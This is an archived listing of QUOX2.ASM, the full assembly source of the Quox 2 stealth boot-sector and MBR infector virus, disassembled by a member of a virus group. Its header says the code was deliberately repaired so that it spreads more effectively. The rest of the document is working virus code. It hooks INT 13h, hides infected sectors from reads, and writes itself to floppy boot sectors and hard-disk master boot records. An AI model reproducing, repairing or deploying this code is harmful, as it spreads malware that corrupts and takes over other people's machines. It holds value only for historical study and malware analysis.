home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / pc / SOURCE.ZIP / QUOX2.ASM < prev    next >
Encoding:
Assembly Source File  |  1996-03-17  |  8.4 KB  |  294 lines
  1. comment %
  2.  
  3.         Title : Quox 2
  4.          Type : Stealth, Boot + MBR infector
  5.     Assembler : Use A86 to create a .BIN bootsector image.
  6.        Disass : Dark Fiber [NuKE]
  7.      Comments : This is a *FIXED* version of Quox, I fixed the code
  8.                 coz I think someone purposley fucked with the copy I had.
  9.                 This version will correctly check to see if its already in
  10.                 memory, it will also infect hard disks whenever the mbr is
  11.                 accessed instead of just on booting up from an infected
  12.                 disk or whatever the original did.
  13.  
  14.                 Its 95% in its original state.
  15. %
  16.  
  17.  
  18. Dos_Media_Descriptor equ 015h
  19.  
  20.                 org     0
  21.  
  22. ;this code is used as its infection marker.
  23. start:
  24.                 cli
  25.                 xor     ax,ax
  26.                 mov     ss,ax
  27.                 mov     sp,7C00h                ;set stack below code
  28.                 sti
  29.                 jmp     short Install_Memory
  30.  
  31. Infection_Marker_Len equ $ - Start
  32.  
  33. ;floopy boot block shit, 02Ch bytes long.
  34. Boot_Block:
  35.                 add     [bp+si],al
  36.                 add     al,[bx+di]
  37.                 add     [bp+si],al
  38.                 jo      $+2
  39.                 mov     al,ds:[0f905h]
  40.                 add     ax,[bx+si]
  41.                 or      [bx+si],ax
  42.                 add     al,[bx+si]
  43.                 db      10 dup (0)
  44.                 db       29h,0F3h
  45.                 db      8, 'X[_QUOX_     '
  46.                 db      0
  47. Boot_Block_Len equ $ - Boot_Block
  48.  
  49. Install_Memory:
  50.                 cld
  51.                 mov     ds,ax
  52.                 mov     si,013h * 4                     ;int 13 vect offset
  53.                 push    cs
  54.                 pop     es
  55.                 mov     di,07c00h + offset Old_Int_13
  56.                 movsw
  57.                 movsw
  58.  
  59. ;This memory check routine is fucked.
  60. ;it checks the wrong part in memory when it looks for itself.
  61.                 mov     ax,[0413h]                      ;get amount o mem in kb
  62.                 mov     dx,ax
  63.                 mov     cl,6
  64.                 shl     ax,cl                           ;convert to paras
  65.                 mov     si,07C00h
  66.                 mov     di,1024
  67.                 mov     es,ax
  68.                 mov     cx,Infection_Marker_Len         ;is virus in TOM
  69.                 repe    cmpsb
  70.                 jz      Already_In_Memory
  71.                 sub     ax,1024/16                      ;sub 1 kb from paras
  72.                 dec     word ptr [0413h]                ;sub 1 kb from total
  73.  
  74. Already_In_Memory:
  75.                 cli
  76.                 mov     word ptr [04ch],offset Int_13_Handler
  77.                 mov     [04eh],ax                       ;set new Int 13h
  78.                 sti
  79.  
  80.                 mov     es,ax
  81.                 xor     di,di
  82.                 mov     si,07c00h
  83.                 mov     cx,256                          ;copy virus to TOM
  84.                 rep     movsw
  85.  
  86.                 mov     ax,offset Jump_2_Himem          ;Jump up to TOM
  87.                 push    es
  88.                 push    ax
  89.                 retf
  90.  
  91. Jump_2_Himem:
  92.                 push    cs
  93.                 pop     ds
  94.                 mov     si,offset _Sector_Locn          ;Reset disk system
  95.                 mov     ah,0
  96.                 mov     dl,[si+2]
  97.                 int     13h
  98.  
  99.                 xor     ax,ax
  100.                 mov     es,ax
  101.                 mov     bx,7C00h
  102.                 mov     ax,201h
  103.                 mov     cx,[si]
  104.                 mov     dx,[si+2]
  105.                 call    Sim_Int_13                      ;read in original
  106.                 jc      Jump_2_Himem                    ;boot sector\mbr
  107.  
  108.                 db      0eaH                            ;jmp 0:7c00h
  109.                 dw      07c00h                          ;jump into old boot
  110.                 dw      ?                               ;code
  111.  
  112. Int_13_Handler:
  113.                 cmp     ah,2                            ;read?
  114.                 je      Try_Infection
  115.                 cmp     ah,3                            ;write?
  116.                 je      Try_Infection
  117.  
  118. Run_Int_13:
  119.                 jmp     dword ptr cs:[Old_Int_13]       ;run old int13
  120.  
  121. Try_Infection:
  122.                 call    Check_Type                      ;is it a good disk?
  123.                 jnz     Run_Int_13
  124.  
  125.                 cmp     cx,1                            ;from first sector?
  126.                 jne     Run_Int_13
  127.  
  128.                 push    ds
  129.                 push    es
  130.                 pusha
  131.  
  132.                 call    Sim_Int_13                      ;run function
  133.  
  134.                 pushf
  135.                 push    cs
  136.                 pop     ds
  137.  
  138.                 call    Grab_Boot                       ;get boot\mbr sector
  139.                 jc      No_Infection
  140.                 jz      Stealth_Read                    ;stealth read
  141.                 call    Infect_Disk                     ;infect it
  142.                 call    Clean_Buffer                    ;clean memory
  143.  
  144. No_Infection:
  145.                 popf
  146.                 popa
  147.                 pop     es
  148.                 pop     ds
  149.                 retf    2
  150.  
  151. Stealth_Read:
  152.                 popf
  153.                 popa
  154.  
  155.                 mov     ax,0201h
  156.                 mov     cx,[512 + _Sector_Locn]
  157.                 mov     dx,[512 + _Drive]
  158.  
  159.                 pop     es
  160.                 pop     ds
  161.                 jmp     short Run_Int_13
  162.  
  163.  
  164. Sim_Int_13:
  165.                 pushf
  166.                 call    dword ptr cs:[Old_Int_13]
  167.                 ret
  168.  
  169.  
  170. Check_Type:
  171.                 or      dh,dh
  172.                 jnz     Bad_Type
  173.  
  174.                 cmp     dl,1
  175.                 jae     Good_Type
  176.                 cmp     dl,080
  177.                 jne     Bad_Type
  178.  
  179. Good_Type:
  180.                 push    ax
  181.                 xor     ax,ax
  182.                 pop     ax
  183. Bad_Type:
  184.                 ret
  185.  
  186.  
  187. Clean_Buffer:
  188.                 pusha
  189.                 push    cs
  190.                 pop     es
  191.  
  192.                 xor     ax,ax
  193.                 mov     cx,256
  194.                 mov     di,512
  195.                 rep     stosw
  196.  
  197.                 popa
  198.                 ret
  199.  
  200.  
  201.  
  202. Grab_Boot:
  203.                 mov     di,2
  204. Read_Sector:
  205.                 push    cs
  206.                 pop     es
  207.                 mov     bx,200h
  208.                 mov     ax,201h
  209.                 call    Sim_Int_13
  210.                 jnc     Check_For_Infection
  211.                 dec     di
  212.                 jnz     Read_Sector
  213.                 stc
  214.                 ret
  215.  
  216. Check_For_Infection:
  217.                 xor     si,si
  218. ;**             mov     di,bx
  219.                 db 08bh, 0fbh
  220.                 mov     cx,Infection_Marker_Len
  221.                 repe    cmpsb
  222.                 ret
  223.  
  224.  
  225.  
  226. Infect_Disk:
  227.                 push    cs
  228.                 pop     es
  229.  
  230.                 mov     di,offset _Sector_Locn
  231.                 mov     si,512 + Dos_Media_Descriptor
  232.                 cmp     byte ptr [si],0F6h              ;? maybe 2.88 media?
  233.                 je      End_Infect_Code
  234.  
  235.                 mov     ax,301h
  236.                 mov     bx,200h
  237.                 mov     dh,1
  238.                 mov     cl,[si+3]                       ;sectors per track
  239.                 mov     ch,4Fh                          ;set for 80 tracks
  240.  
  241.                 cmp     byte ptr [si],0FDh              ;1.2mb
  242.                 jne     Is_Hard_Disk
  243.  
  244.                 mov     ch,27h                          ;set for 40tracks
  245.  
  246. Is_Hard_Disk:
  247.                 cmp     dl,80h
  248.                 jne     Not_Hard_Disk
  249.                 mov     cx,w[512 + _Partition + 8]      ;starting sector #
  250.                 xor     dh,dh                           ;realative to beg o hd
  251.  
  252. Not_Hard_Disk:
  253.                 mov     [di],cx
  254.                 mov     [di+2],dx
  255.                 call    Sim_Int_13
  256.                 jc      End_Infect_Code
  257.  
  258.                 mov     cx,Boot_Block_Len
  259.                 mov     di,Boot_Block
  260.                 mov     si,512 + Boot_Block
  261.                 rep     movsb
  262.  
  263.                 mov     di,offset _Partition
  264.                 mov     si,512 + _Partition
  265.                 mov     cx,20h
  266.                 rep     movsw
  267.  
  268.                 inc     cx
  269.                 xor     bx,bx
  270.                 mov     ax,301h
  271.                 xor     dh,dh
  272.                 call    Sim_Int_13
  273.  
  274. End_Infect_Code:
  275.                 ret
  276.  
  277. Old_Int_13:     dd      ?
  278.                 db      30 dup (0)              ;??? Filler?
  279.  
  280. _Sector_Locn:   db      09, 04fh
  281. _Drive:         db      0h
  282. _Head:          db      01h
  283.  
  284.                 db      10 dup (0)              ;??? More Filler?
  285.  
  286. _Partition      db      64 dup (0)
  287.  
  288. Bootstrap_BIOS_Marker:
  289.                 db       55h,0AAh
  290.  
  291. seg_a           ends
  292.  
  293.                 end     start
  294.